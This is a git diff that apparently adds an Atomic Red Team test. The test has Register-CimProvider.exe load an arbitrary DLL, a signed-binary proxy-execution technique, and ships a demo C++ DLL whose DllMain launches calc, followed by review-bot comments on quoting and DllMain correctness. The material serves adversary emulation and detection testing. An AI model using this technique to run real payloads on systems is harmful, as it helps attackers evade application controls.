diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index aba47707..93129931 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -40,3 +40,20 @@ atomic_tests:
 name: command_prompt
 command: |
 SyncAppvPublishingServer.exe "n; #{powershell_code}"
+
+- name: Register-CimProvider - Execute evil dll
+ description: |
+ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: |
+ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
diff --git a/atomics/T1218/src/T1218-2.cpp b/atomics/T1218/src/T1218-2.cpp
new file mode 100644
index 00000000..0e65a65f
--- /dev/null
+++ b/atomics/T1218/src/T1218-2.cpp
@@ -0,0 +1,12 @@
+#include
+
+int beerTime()
+{
+ WinExec("calc", SW_SHOWNORMAL);
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
+{
+ beerTime();
+ return 0;
+}
diff --git a/atomics/T1218/src/Win32/T1218-2.dll b/atomics/T1218/src/Win32/T1218-2.dll
new file mode 100644
index 00000000..7334ea8b
Binary files /dev/null and b/atomics/T1218/src/Win32/T1218-2.dll differ
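Review bot: The `dll_payload` argument is interpolated unquoted into the executor command on the last added line of the YAML hunk, so any path containing a space (including the UNC paths the description invites by mentioning SMB) splits the `-Path` argument; quote it: `C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"`. The command also hard-codes the SysWow64 copy of Register-CimProvider.exe, which is the 32-bit binary and is the right match for the Win32 build of the default DLL, but SysWow64 exists only on 64-bit Windows and a 64-bit host using the System32 binary would need a 64-bit DLL; the description should state this pairing, e.g. `Uses the 32-bit Register-CimProvider.exe (SysWow64) because the bundled payload is a Win32 DLL; a 64-bit payload would need the System32 binary.` Finally, the default payload (per src/T1218-2.cpp in this commit) launches a process and nothing in the test tears it down, so a sentence noting that the spawned calc.exe is left running, or a cleanup step if this test format supports one, would help whoever runs it.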
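Review bot: `DllMain` calls `beerTime()` unconditionally, so the payload fires on every loader notification (DLL_THREAD_ATTACH/DETACH and DLL_PROCESS_DETACH as well as DLL_PROCESS_ATTACH), and `beerTime` is declared `int` but never returns a value, which is undefined behavior in C++ and a warning on most compilers. Gate the call on `fdwReason == DLL_PROCESS_ATTACH` and make the helper `void`, as below. `return 0` is FALSE, which tells the loader the attach failed so the host's load of the DLL is reported as an error after the payload has already run; if that early unload is intended for the test, say so in a comment (`// FALSE: make the loader unload us once the payload has run`), otherwise return TRUE. Note also that WinExec from DllMain runs under the loader lock, which Microsoft documents as unsafe; it works for a demo payload but deserves a one-line comment so nobody copies the pattern into real code.
```cpp
static void beerTime(void)
{
    // … unchanged: WinExec("calc", ...) …
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    // Fire once, on process attach only; thread notifications and detach are ignored.
    if (fdwReason == DLL_PROCESS_ATTACH) {
        beerTime();
    }
    // … unchanged: return 0; (FALSE) …
}
```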